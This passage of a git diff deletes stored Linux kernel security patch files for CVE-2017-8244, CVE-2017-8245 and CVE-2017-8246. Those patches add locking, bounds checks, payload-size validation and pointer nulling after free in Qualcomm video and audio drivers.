- 	struct msm_vidc_inst *inst = file->private_data;
- 	struct msm_vidc_core *core = inst ? inst->core : NULL;
- 	int i, j;
-+	ssize_t len = 0;
- 
- 	if (!inst || !core) {
- 		dprintk(VIDC_ERR, "Invalid params, core: %pK inst %pK\n",
-@@ -277,6 +293,7 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 		return 0;
- 	}
- 
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst,
-@@ -333,9 +350,12 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 	write_str(&dbg_buf, "FBD Count: %d\n", inst->count.fbd);
- 
- 	publish_unreleased_reference(inst);
--	put_inst(inst);
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 		dbg_buf.ptr, dbg_buf.filled_size);
-+
-+	mutex_unlock(&dbg_buf.lock);
-+	put_inst(inst);
-+	return len;
- }
- 
- static const struct file_operations inst_info_fops = {
-@@ -416,3 +436,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 	}
- }
- 
-+void msm_vidc_debugfs_deinit_drv(void)
-+{
-+	mutex_destroy(&dbg_buf.lock);
-+}
-+
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-index 55485c6..abf8d3a 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-@@ -126,6 +126,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- 		struct dentry *parent);
- void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 		enum msm_vidc_debugfs_event e);
-+void msm_vidc_debugfs_deinit_drv(void);
- 
- static inline void tic(struct msm_vidc_inst *i, enum profiling_points p,
- 				 char *b)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch
deleted file mode 100644
index 9c60f33d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch
+++ /dev/null
@@ -1,165 +0,0 @@
-From fe3bdd12315656347d1bca82d920b3df1a2b0e8a Mon Sep 17 00:00:00 2001
-From: Abdulla Anam <abdullahanam@codeaurora.org>
-Date: Wed, 22 Mar 2017 14:00:10 +0530
-Subject: msm: vidc: Protect debug_buffer access in info_read with lock
-
-Serialize core_info_read & inst_info_read with lock so that
-multiple concurrent threads do not cause the write to
-overflow. Also have the bound check to avoid overflow in
-write_str function..
-
-Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f
-Signed-off-by: Abdulla Anam <abdullahanam@codeaurora.org>
----
- drivers/media/platform/msm/vidc/msm_v4l2_vidc.c  |  3 +++
- drivers/media/platform/msm/vidc/msm_vidc_debug.c | 33 +++++++++++++++++++++---
- drivers/media/platform/msm/vidc/msm_vidc_debug.h |  1 +
- 3 files changed, 33 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index a632797..a8dc1d0 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -766,6 +766,8 @@ static int __init msm_vidc_init(void)
- 	if (rc) {
- 		dprintk(VIDC_ERR,
- 			"Failed to register platform driver\n");
-+		msm_vidc_debugfs_deinit_drv();
-+		debugfs_remove_recursive(vidc_driver->debugfs_root);
- 		kfree(vidc_driver);
- 		vidc_driver = NULL;
- 	}
-@@ -776,6 +778,7 @@ static int __init msm_vidc_init(void)
- static void __exit msm_vidc_exit(void)
- {
- 	platform_driver_unregister(&msm_vidc_driver);
-+	msm_vidc_debugfs_deinit_drv();
- 	debugfs_remove_recursive(vidc_driver->debugfs_root);
- 	mutex_destroy(&vidc_driver->lock);
- 	kfree(vidc_driver);
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index 1248a1c..a9b367d 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -38,6 +38,7 @@ bool msm_vidc_debug_timeout = false;
- #define MAX_DBG_BUF_SIZE 4096
- 
- struct debug_buffer {
-+	struct mutex lock;
- 	char ptr[MAX_DBG_BUF_SIZE];
- 	char *curr;
- 	u32 filled_size;
-@@ -64,8 +65,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...)
- {
- 	va_list args;
- 	u32 size;
-+
-+	char *curr = buffer->curr;
-+	char *end = buffer->ptr + MAX_DBG_BUF_SIZE;
-+
- 	va_start(args, fmt);
--	size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args);
-+	size = vscnprintf(curr, end - curr, fmt, args);
- 	va_end(args);
- 	buffer->curr += size;
- 	buffer->filled_size += size;
-@@ -79,12 +84,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- 	struct hfi_device *hdev;
- 	struct hal_fw_info fw_info = { {0} };
- 	int i = 0, rc = 0;
-+	ssize_t len = 0;
- 
- 	if (!core || !core->device) {
- 		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		return 0;
- 	}
- 	hdev = core->device;
-+
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core);
-@@ -108,8 +116,11 @@ err_fw_info:
- 			completion_done(&core->completions[SYS_MSG_INDEX(i)]) ?
- 			"pending" : "done");
- 	}
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 			dbg_buf.ptr, dbg_buf.filled_size);
-+
-+	mutex_unlock(&dbg_buf.lock);
-+	return len;
- }
- 
- static const struct file_operations core_info_fops = {
-@@ -147,7 +158,10 @@ static const struct file_operations ssr_fops = {
- struct dentry *msm_vidc_debugfs_init_drv(void)
- {
- 	bool ok = false;
--	struct dentry *dir = debugfs_create_dir("msm_vidc", NULL);
-+	struct dentry *dir = NULL;
-+
-+	mutex_init(&dbg_buf.lock);
-+	dir = debugfs_create_dir("msm_vidc", NULL);
- 	if (IS_ERR_OR_NULL(dir)) {
- 		dir = NULL;
- 		goto failed_create_dir;
-@@ -216,6 +230,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- 		dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
- 		goto failed_create_dir;
- 	}
-+
- 	if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) {
- 		dprintk(VIDC_ERR, "debugfs_create_file: fail\n");
- 		goto failed_create_dir;
-@@ -269,11 +284,14 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- {
- 	struct msm_vidc_inst *inst = file->private_data;
- 	int i, j;
-+	ssize_t len = 0;
- 
- 	if (!inst) {
- 		dprintk(VIDC_ERR, "Invalid params, inst %pK\n", inst);
- 		return 0;
- 	}
-+
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst,
-@@ -331,8 +349,10 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 
- 	publish_unreleased_reference(inst);
- 
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 		dbg_buf.ptr, dbg_buf.filled_size);
-+	mutex_unlock(&dbg_buf.lock);
-+	return len;
- }
- 
- static const struct file_operations inst_info_fops = {
-@@ -413,3 +433,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 	}
- }
- 
-+void msm_vidc_debugfs_deinit_drv(void)
-+{
-+	mutex_destroy(&dbg_buf.lock);
-+}
-+
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-index 39ac627..853ce4b 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-@@ -126,6 +126,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- 		struct dentry *parent);
- void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 		enum msm_vidc_debugfs_event e);
-+void msm_vidc_debugfs_deinit_drv(void);
- 
- static inline void tic(struct msm_vidc_inst *i, enum profiling_points p,
- 				 char *b)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch
deleted file mode 100644
index 5d5d5ed8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From ececf97911515114030bef1fc6df630dbb706f17 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 28 Feb 2017 12:52:30 -0800
-Subject: drivers: soc: add size check
-
-Add size check to ensure the payload fits inside the declared payload
-size to prevent loss of data when copying.
-
-CRs-Fixed: 2009224
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
-Change-Id: I4275c626605272941143b54a7b8861b25f8e750a
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 57 ++++++++++++++++++++++++++++--------
- 1 file changed, 44 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 10f71b8..fe54589 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 	struct voice_svc_prvt *prtd;
- 	struct voice_svc_write_msg *data = NULL;
- 	uint32_t cmd;
-+	struct voice_svc_register *register_data = NULL;
-+	struct voice_svc_cmd_request *request_data = NULL;
-+	uint32_t request_payload_size;
- 
- 	pr_debug("%s\n", __func__);
- 
-@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		 */
- 		if (count == (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_register))) {
--			ret = process_reg_cmd(
--			(struct voice_svc_register *)data->payload, prtd);
-+			register_data =
-+				(struct voice_svc_register *)data->payload;
-+			if (register_data == NULL) {
-+				pr_err("%s: register data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+			ret = process_reg_cmd(register_data, prtd);
- 			if (!ret)
- 				ret = count;
- 		} else {
--			pr_err("%s: invalid payload size\n", __func__);
-+			pr_err("%s: invalid data payload size for register command\n",
-+				__func__);
- 			ret = -EINVAL;
- 			goto done;
- 		}
-@@ -430,19 +440,40 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		/*
- 		 * Check that count reflects the expected size to ensure
- 		 * sufficient memory was allocated. Since voice_svc_cmd_request
--		 * has a variable size, check the minimum value count must be.
-+		 * has a variable size, check the minimum value count must be to
-+		 * parse the message request then check the minimum size to hold
-+		 * the payload of the message request.
- 		 */
- 		if (count >= (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_cmd_request))) {
--		ret = voice_svc_send_req(
--			(struct voice_svc_cmd_request *)data->payload, prtd);
--		if (!ret)
--			ret = count;
--	} else {
--		pr_err("%s: invalid payload size\n", __func__);
--		ret = -EINVAL;
--		goto done;
--	}
-+			request_data =
-+				(struct voice_svc_cmd_request *)data->payload;
-+			if (request_data == NULL) {
-+				pr_err("%s: request data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+
-+			request_payload_size = request_data->payload_size;
-+
-+			if (count >= (sizeof(struct voice_svc_write_msg) +
-+				      sizeof(struct voice_svc_cmd_request) +
-+				      request_payload_size)) {
-+				ret = voice_svc_send_req(request_data, prtd);
-+				if (!ret)
-+					ret = count;
-+			} else {
-+				pr_err("%s: invalid request payload size\n",
-+					__func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+		} else {
-+			pr_err("%s: invalid data payload size for request command\n",
-+				__func__);
-+			ret = -EINVAL;
-+			goto done;
-+		}
- 		break;
- 	default:
- 		pr_debug("%s: Invalid command: %u\n", __func__, cmd);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch
deleted file mode 100644
index b7272ac3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From f53af3805879292423465cd0877cc7a75131ce10 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 28 Feb 2017 12:52:30 -0800
-Subject: drivers: soc: add size check
-
-Add size check to ensure the payload fits inside the declared payload
-size to prevent loss of data when copying.
-
-CRs-Fixed: 2009224
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
-Change-Id: I4275c626605272941143b54a7b8861b25f8e750a
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 49 +++++++++++++++++++++++++++++-------
- 1 file changed, 40 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index fbd90bc..fe54589 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 	struct voice_svc_prvt *prtd;
- 	struct voice_svc_write_msg *data = NULL;
- 	uint32_t cmd;
-+	struct voice_svc_register *register_data = NULL;
-+	struct voice_svc_cmd_request *request_data = NULL;
-+	uint32_t request_payload_size;
- 
- 	pr_debug("%s\n", __func__);
- 
-@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		 */
- 		if (count == (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_register))) {
--			ret = process_reg_cmd(
--			(struct voice_svc_register *)data->payload, prtd);
-+			register_data =
-+				(struct voice_svc_register *)data->payload;
-+			if (register_data == NULL) {
-+				pr_err("%s: register data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+			ret = process_reg_cmd(register_data, prtd);
- 			if (!ret)
- 				ret = count;
- 		} else {
--			pr_err("%s: invalid payload size\n", __func__);
-+			pr_err("%s: invalid data payload size for register command\n",
-+				__func__);
- 			ret = -EINVAL;
- 			goto done;
- 		}
-@@ -430,16 +440,37 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		/*
- 		 * Check that count reflects the expected size to ensure
- 		 * sufficient memory was allocated. Since voice_svc_cmd_request
--		 * has a variable size, check the minimum value count must be.
-+		 * has a variable size, check the minimum value count must be to
-+		 * parse the message request then check the minimum size to hold
-+		 * the payload of the message request.
- 		 */
- 		if (count >= (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_cmd_request))) {
--			ret = voice_svc_send_req(
--			(struct voice_svc_cmd_request *)data->payload, prtd);
--			if (!ret)
--				ret = count;
-+			request_data =
-+				(struct voice_svc_cmd_request *)data->payload;
-+			if (request_data == NULL) {
-+				pr_err("%s: request data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+
-+			request_payload_size = request_data->payload_size;
-+
-+			if (count >= (sizeof(struct voice_svc_write_msg) +
-+				      sizeof(struct voice_svc_cmd_request) +
-+				      request_payload_size)) {
-+				ret = voice_svc_send_req(request_data, prtd);
-+				if (!ret)
-+					ret = count;
-+			} else {
-+				pr_err("%s: invalid request payload size\n",
-+					__func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
- 		} else {
--			pr_err("%s: invalid payload size\n", __func__);
-+			pr_err("%s: invalid data payload size for request command\n",
-+				__func__);
- 			ret = -EINVAL;
- 			goto done;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch
deleted file mode 100644
index 84c63526..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 5b2f6e011ba92f28e8d7dbeb11c4ee7344c33186 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 28 Feb 2017 12:52:30 -0800
-Subject: drivers: soc: add size check
-
-Add size check to ensure the payload fits inside the declared payload
-size to prevent loss of data when copying.
-
-CRs-Fixed: 2009224
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
-Change-Id: I4275c626605272941143b54a7b8861b25f8e750a
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 57 ++++++++++++++++++++++++++++--------
- 1 file changed, 44 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 10f71b8..fe54589 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 	struct voice_svc_prvt *prtd;
- 	struct voice_svc_write_msg *data = NULL;
- 	uint32_t cmd;
-+	struct voice_svc_register *register_data = NULL;
-+	struct voice_svc_cmd_request *request_data = NULL;
-+	uint32_t request_payload_size;
- 
- 	pr_debug("%s\n", __func__);
- 
-@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		 */
- 		if (count == (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_register))) {
--			ret = process_reg_cmd(
--			(struct voice_svc_register *)data->payload, prtd);
-+			register_data =
-+				(struct voice_svc_register *)data->payload;
-+			if (register_data == NULL) {
-+				pr_err("%s: register data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+			ret = process_reg_cmd(register_data, prtd);
- 			if (!ret)
- 				ret = count;
- 		} else {
--			pr_err("%s: invalid payload size\n", __func__);
-+			pr_err("%s: invalid data payload size for register command\n",
-+				__func__);
- 			ret = -EINVAL;
- 			goto done;
- 		}
-@@ -430,19 +440,40 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		/*
- 		 * Check that count reflects the expected size to ensure
- 		 * sufficient memory was allocated. Since voice_svc_cmd_request
--		 * has a variable size, check the minimum value count must be.
-+		 * has a variable size, check the minimum value count must be to
-+		 * parse the message request then check the minimum size to hold
-+		 * the payload of the message request.
- 		 */
- 		if (count >= (sizeof(struct voice_svc_write_msg) +
- 			      sizeof(struct voice_svc_cmd_request))) {
--		ret = voice_svc_send_req(
--			(struct voice_svc_cmd_request *)data->payload, prtd);
--		if (!ret)
--			ret = count;
--	} else {
--		pr_err("%s: invalid payload size\n", __func__);
--		ret = -EINVAL;
--		goto done;
--	}
-+			request_data =
-+				(struct voice_svc_cmd_request *)data->payload;
-+			if (request_data == NULL) {
-+				pr_err("%s: request data is NULL", __func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+
-+			request_payload_size = request_data->payload_size;
-+
-+			if (count >= (sizeof(struct voice_svc_write_msg) +
-+				      sizeof(struct voice_svc_cmd_request) +
-+				      request_payload_size)) {
-+				ret = voice_svc_send_req(request_data, prtd);
-+				if (!ret)
-+					ret = count;
-+			} else {
-+				pr_err("%s: invalid request payload size\n",
-+					__func__);
-+				ret = -EINVAL;
-+				goto done;
-+			}
-+		} else {
-+			pr_err("%s: invalid data payload size for request command\n",
-+				__func__);
-+			ret = -EINVAL;
-+			goto done;
-+		}
- 		break;
- 	default:
- 		pr_debug("%s: Invalid command: %u\n", __func__, cmd);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch
deleted file mode 100644
index 050ef057..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 578eb74435eccdc3df516fd744941a7d872fac6c Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free.
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
-Signed-off-by: Bikshapathi Kothapeta <bkotha@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 1 +
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c     | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c     | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c   | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c      | 5 ++++-
- 5 files changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index 245d2f5..0cd60c8 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1138,6 +1138,7 @@ static int msm_compr_free(struct snd_compr_stream *cstream)
- 	kfree(pdata->dec_params[soc_prtd->dai_link->be_id]);
- 	pdata->dec_params[soc_prtd->dai_link->be_id] = NULL;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index d3d18917..8ab83d2 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -499,6 +499,7 @@ done:
- 	mutex_unlock(&prtd->lock);
- 	prtd->prepared--;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index 64d3fe0..507d01a 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2017,  The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -497,6 +497,7 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- 
- 	pr_debug("%s\n", __func__);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-index 7c69081..de126e1 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -517,6 +517,7 @@ static int msm_pcm_close(struct snd_pcm_substream *substream)
- 					 SNDRV_PCM_STREAM_PLAYBACK :
- 					 SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 455607b..b8dbc63 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -721,6 +721,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 						SNDRV_PCM_STREAM_PLAYBACK);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
-+
- 	return 0;
- }
- 
-@@ -824,6 +826,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 		SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch
deleted file mode 100644
index 7955c943..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch
+++ /dev/null
@@ -1,124 +0,0 @@
-From 30baaec8afb05abf9f794c631ad944838d498ab8 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c     | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c     | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c   | 4 +++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c      | 5 ++++-
- 5 files changed, 13 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index c49a4de..90741ce 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1599,6 +1599,7 @@ static int msm_compr_playback_free(struct snd_compr_stream *cstream)
- 	kfree(pdata->dec_params[soc_prtd->dai_link->be_id]);
- 	pdata->dec_params[soc_prtd->dai_link->be_id] = NULL;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-@@ -1658,6 +1659,7 @@ static int msm_compr_capture_free(struct snd_compr_stream *cstream)
- 	q6asm_audio_client_free(ac);
- 
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index d65108e..b1a1ea5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -684,6 +684,7 @@ done:
- 	mutex_unlock(&prtd->lock);
- 	prtd->prepared--;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index 65c0e51..a7619fd 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
